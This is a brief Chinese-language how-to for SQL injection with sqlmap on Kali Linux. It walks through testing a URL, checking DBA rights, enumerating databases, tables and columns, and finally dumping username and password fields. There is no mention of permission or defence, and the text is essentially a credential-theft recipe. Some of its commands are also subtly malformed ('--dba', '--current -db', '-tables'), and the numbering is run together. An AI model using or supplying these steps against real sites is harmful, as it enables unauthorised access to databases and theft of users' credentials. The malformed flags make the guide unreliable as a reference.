基于Kali的SQLMAP数据库注入
1.打开终端,输入
sqlmap -u "网址"
#### 检测是否具有漏洞
2.检查一下是否具有dba权限
sqlmap -u "网址" --is-dba3.列出所有数据库
sqlmap -u "网址" --dba4.查找数据库
sqlmap -u "" --current -db5.猜解表名,根据上一步得出的数据库
sqlmap -u "网址" -tables -D "数据库名(上一步得出的)"6.查询列名
sqlmap -u "网址" --columns -T "上一步得出的表名" -D "数据库名"7.查询字段,获取用户名与密码
sqlmap -u "网址" --dump -C "username,password" -T "上一步得到的表名" -D "数据库名"